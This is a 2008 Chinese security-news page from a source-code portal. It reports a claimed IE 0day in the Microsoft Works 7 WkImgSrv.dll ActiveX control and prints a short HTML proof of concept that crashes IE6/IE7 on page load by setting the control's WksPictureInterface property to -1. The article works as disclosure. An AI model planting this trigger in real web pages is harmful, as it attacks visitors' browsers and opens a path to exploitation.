• ----:)欢迎访问源码网(:----
    • 首页
    • 博客
    • 学院
    • 下载
    • 论坛
    • 影视
    • 发布源码
    • RSS
    • ITPig
    • 笑话网
    • 百家姓
    • 繁體中文

源码网 - 中国第一源码门户
选择镜像:网通镜像 - 电信主站
  • 首 页
  • 新闻动态
  • 网站运营
  • 网页制作
  • WEB开发
  • 编程开发
  • 图像媒体
  • 操作系统
  • 数据库
  • 服务器
热门搜索 优化 SEO 故事 cms IIS7 MySQL 个人 AdSense 主题推广 | 文章搜索: 高级搜索
会员登录/控制面版您的位置: 学院首页 >> 新闻动态 >> 程序安全 >> 详细内容
 

推荐文章

 
 

热点文章

  • LBS^2漏洞
  • 国产多用户博客BLOG程序试用手记!
  • 谈新手如何安装discuz6.0.0正式版
  • 网关IP和MAC地址绑定批处理防止Arp欺骗攻击
  • EasyWebServer网站服务器 V1.9 介绍及使用说明
  • 新一代企业级电子商务平台问世
  • 最近网络上最狠的病毒惊现
  • 动易SiteFactory CMS 1.0版正式发布!
  • 4月6日安全漏洞PHPWind官方表态
  • Dede2007 分类信息模型抢先预览
  • lbs blog又一注射漏洞含漏洞解析和exp
  • 饱饱眼瘾 DeDeCMS最新后台截图秘密透露
 
 

相关文章

  • 死了都要Hi-百度HI低级漏洞 可查看所有用户名
  • Google也有漏洞 新的服务大批曝光
  • Google工具条有漏洞 改变默认搜索就报警
  • lbs blog又一注射漏洞含漏洞解析和exp
  • 微软Vista系统曝出致命漏洞 系统10秒钟内崩溃
  • 犯罪团伙利用支付平台漏洞 盗游戏点卡获利百万
  • Microsoft的优化SQL方法
  • LBS^2漏洞
  • 多个Comdev产品adminfoot.php远程文件包含漏洞
  • 进军CPU市场!Microsoft启动CPU开发团队
 
 

百度搜索

 
 

又一个IE 0day漏洞 - 问题出自Microsoft Works

  • 阅览次数:
  • 文章来源: http://www.scanw.com/blog/
  • 原文作者:
  • 整理日期: 2008-04-18
  • 发表评论
  • 字体大小:
  • 小
  • 中
  • 大

近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。
 

影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)

以下为crash POC

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
    function payload() {
             var num = -1;
             obj.WksPictureInterface = num;
             }
   </script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
 

上一篇:比AcdSee功能还强大的图片处理、编辑软件,推荐下载!
下一篇:ASP上传漏洞防范
  • 网友评论:
  • 查看所有评论
  • 我要发表评论
您的网名:
留言主题:
你要发表的内容:

 

关于本站 | 广告联系 | 版权声明 | 网站地图 | 发布软件 | 帮助中心 | 源码论坛

Copyright © 2005-2007 CodePub.Com  程序支持:木翼  滇ICP备05005971号